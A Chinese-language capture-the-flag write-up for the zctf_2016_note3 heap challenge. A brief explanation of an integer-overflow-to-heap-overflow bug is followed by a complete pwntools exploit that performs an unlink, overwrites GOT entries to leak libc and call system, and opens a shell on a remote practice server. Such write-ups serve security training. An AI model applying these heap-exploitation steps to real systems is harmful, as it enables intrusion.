zctf_2016_note3
首先檢查一下程序的保護機制
然後用IDA分析一下,edit裏存在一個整數溢出導致堆溢出的漏洞。當輸入爲0x8000000000000000時,即可使得index爲-1,由於輸入的長度不夠,因此將0x8000000000000000轉爲負數的形式輸入進去即可。然後就是正常的unlink了。
#coding:utf8
from pwn import *
#sh = process('./zctf_2016_note3')
sh = remote('node3.buuoj.cn',29603)
elf = ELF('./zctf_2016_note3')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
atoi_got = elf.got['atoi']
free_got = elf.got['free']
puts_plt = elf.plt['puts']
heap_0_ptr_addr = 0x00000000006020C8
def add(size,content):
sh.sendlineafter('option--->>','1')
sh.sendlineafter('(less than 1024)',str(size))
sh.sendafter('content:',content[0:size-1])
def edit(index,content):
sh.sendlineafter('option--->>','3')
sh.sendlineafter('Input the id of the note:',str(index))
sh.sendafter('Input the new content:',content)
def delete(index):
sh.sendlineafter('option--->>','4')
sh.sendlineafter('Input the id of the note:',str(index))
#0
add(0x100,'a'*0x100)
#1
add(0x100,'b'*0x100)
#2
add(0x10,'c'*0x10)
#3
add(0x10,'c'*0x10)
#4
add(0x10,'c'*0x10)
#5
add(0x10,'c'*0x10)
#6
add(0x10,'c'*0x10)
#讓heaps[-1]爲heaps[0]
delete(0)
add(0x100,'a'*0x100)
#現在,通過讓index爲-1,就可以溢出chunk0
payload = p64(0) + p64(0x101)
payload += p64(heap_0_ptr_addr - 0x18) + p64(heap_0_ptr_addr - 0x10)
payload = payload.ljust(0x100,'a')
payload += p64(0x100) + p64(0x110)
payload += '\n'
edit(0x8000000000000000 - 0x10000000000000000,payload)
#unlink
delete(1)
payload = p64(0) * 3 + p64(free_got) + p64(atoi_got) *2
payload = payload.ljust(80,'\x00')
payload += p64(0x8)*3
edit(0,p64(0) * 3 + p64(free_got) + p64(atoi_got) *2 + '\n')
#修改free的got表爲puts的plt表
edit(0,p64(puts_plt)[0:7] + '\n')
#泄露atoi地址
delete(1)
sh.recvuntil('\n')
atoi_addr = u64(sh.recv(6).ljust(8,'\x00'))
libc_base = atoi_addr - libc.sym['atoi']
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
#修改atoi的got表爲system地址
edit(2,p64(system_addr)[0:7] + '\n')
#getshell
sh.sendlineafter('option--->>','/bin/sh\x00')
sh.interactive()